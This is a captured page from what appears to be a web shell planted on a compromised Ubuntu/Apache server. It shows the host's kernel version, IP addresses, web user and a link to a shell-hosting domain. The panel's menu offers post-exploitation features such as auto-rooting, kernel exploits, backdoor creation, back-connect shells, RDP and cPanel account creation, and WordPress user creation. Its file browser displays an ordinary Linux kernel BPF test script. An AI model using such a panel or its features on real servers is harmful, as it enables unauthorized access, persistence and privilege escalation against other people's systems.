Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.23.85.47
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-4.15.0-210 /
samples /
bpf /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
8.71
KB
-rw-r--r--
lwt_len_hist.sh
1.02
KB
-rwxr-xr-x
run_cookie_uid_helper_example....
341
B
-rwxr-xr-x
tc_l2_redirect.sh
4.91
KB
-rwxr-xr-x
test_cgrp2_sock.sh
2.85
KB
-rwxr-xr-x
test_cgrp2_sock2.sh
1.45
KB
-rwxr-xr-x
test_cgrp2_tc.sh
4.15
KB
-rwxr-xr-x
test_cls_bpf.sh
915
B
-rwxr-xr-x
test_ipip.sh
5.59
KB
-rwxr-xr-x
test_lwt_bpf.sh
8.96
KB
-rwxr-xr-x
test_tunnel_bpf.sh
4.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_cls_bpf.sh
#!/bin/bash # SPDX-License-Identifier: GPL-2.0 function pktgen { ../pktgen/pktgen_bench_xmit_mode_netif_receive.sh -i $IFC -s 64 \ -m 90:e2:ba:ff:ff:ff -d 192.168.0.1 -t 4 local dropped=`tc -s qdisc show dev $IFC | tail -3 | awk '/drop/{print $7}'` if [ "$dropped" == "0," ]; then echo "FAIL" else echo "Successfully filtered " $dropped " packets" fi } function test { echo -n "Loading bpf program '$2'... " tc qdisc add dev $IFC clsact tc filter add dev $IFC ingress bpf da obj $1 sec $2 local status=$? if [ $status -ne 0 ]; then echo "FAIL" else echo "ok" pktgen fi tc qdisc del dev $IFC clsact } IFC=test_veth ip link add name $IFC type veth peer name pair_$IFC ip link set $IFC up ip link set pair_$IFC up test ./parse_simple.o simple test ./parse_varlen.o varlen test ./parse_ldabs.o ldabs ip link del dev $IFC
Close